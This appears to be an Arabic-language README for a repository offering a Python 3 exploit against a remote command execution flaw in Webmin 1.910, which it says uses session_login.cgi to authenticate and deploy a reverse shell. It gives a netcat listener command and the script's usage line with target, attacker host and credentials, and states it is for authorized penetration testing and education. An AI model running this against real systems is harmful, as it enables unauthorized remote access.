
استغلال تنفيذ التعليمات البرمجية عن بُعد في Webmin 1.910
استغلال تنفيذ الأوامر عن بُعد في Webmin 1.910
يحتوي هذا المستودع على سكربت بلغة Python 3 مصمم لاستغلال ثغرة تنفيذ الأوامر عن بُعد في الإصدار 1.910 من Webmin. يستخدم السكربت نقطة النهاية session_login.cgi لإجراء المصادقة ونشر حمولة reverse shell، مما يتيح الوصول عن بُعد إلى النظام المستهدف. هذا الاستغلال مخصص لاختبار الاختراق المصرح به والأغراض التعليمية.
nc -lvnp <lport>
python3 webmin_exploit.py --rhost <target_ip> --lhost <your_ip> --lport <your_port> -u <username> -p <password>

